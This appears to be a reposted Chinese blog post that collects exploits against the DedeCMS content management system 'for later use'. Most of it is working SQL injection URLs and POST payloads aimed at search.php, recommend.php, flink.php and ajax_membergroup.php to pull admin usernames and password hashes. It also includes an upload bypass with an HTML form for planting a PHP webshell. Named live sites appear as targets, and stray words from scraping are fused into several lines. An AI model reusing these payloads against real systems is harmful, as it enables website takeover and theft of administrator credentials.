DedeCMS多個漏洞exp彙總,以備後用
爆路徑:data/mysql_error_trace.incphp
1、dedecms plus/search.php注入漏洞修復及利用html
0×1:python
http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
報錯若是爲:Safe Alert: Request Error step 2 !
則利用如下exp:mysql
http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
0×2:web
http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
報錯若是爲:Safe Alert: Request Error step 1 !
則利用如下exp:ajax
http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
2、DedeCms recommend.php注入sql
exp:app
http://0day5.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
3、flink.php注入ide
0x1:首先經過flink_add.php查看驗證碼post
0x2:利用火狐的hackbar發送post數據包
exp:
查版本:
Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select version())),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=驗證碼&_FILES[webname][name]=1.gif&_FILES[webname][type]=p_w_picpath/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\
查密碼:
Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=驗證碼&_FILES[webname][name]=1.gif&_FILES[webname][type]=p_w_picpath/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\
詳情請見
http://www.wooyun.org/bugs/wooyun-2014-051950
4、ajax_membergroup.php注入漏洞
①注入漏洞。
這站 http://www.30tianlong.com/
首先訪問「/data/admin/ver.txt」頁面獲取系統最後升級時間,
而後訪問「/member/ajax_membergroup.php?action=post&membergroup=1」頁面,如圖說明存在該漏洞。
而後寫上語句
查看管理員賬號
http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
admin
查看管理員密碼
http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
8d29b1ef9f8c5a5af429
查看管理員密碼
獲得的是19位的,去掉前三位和最後一位,獲得管理員的16位MD5
8d2
9b1ef9f8c5a5af42
9
cmd5沒解出來 只好測試第二個方法
②上傳漏洞:
只要登錄會員中心,而後訪問頁面連接
http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[/code]=../dialog/select_soft_post
如圖,說明經過「/plus/carbuyaction.php」已經成功調用了上傳頁面「/dialog/select_soft_post」
因而將Php一句話***擴展名改成「rar」等,利用提交頁面upload1.htm
<form action="http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs1=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="simple.Php"/> <button class="button2" type="submit">提交</button><br><br>
便可上傳成功
轉載文章請註明,轉載自:小馬's Blog http://www.i0day.com
- 1. dedecms 漏洞彙總
- 2. Zabbix漏洞彙總
- 3. DeDecms遠程寫入漏洞webshell (dedecms漏洞)
- 4. dedecms v5.7(build 20150618)的12個漏洞
- 5. DEDECMS v5.6漏洞復現
- 6. DedeCms v5.7 SQL注入漏洞
- 7. WEB應用漏洞及修復彙總
- 8. Dedecms V5.7 SP2版本漏洞利用
- 9. 如何利用BurpSuite復刻Dedecms漏洞
- 10. Struts2漏洞之S2-016漏洞分析與exp編寫
- 更多相關文章...
- • Docker 資源彙總 - Docker教程
- • PHP exp() 函數 - PHP參考手冊
- • 算法總結-雙指針
- • 算法總結-回溯法
-
每一个你不满意的现在,都有一个你没有努力的曾经。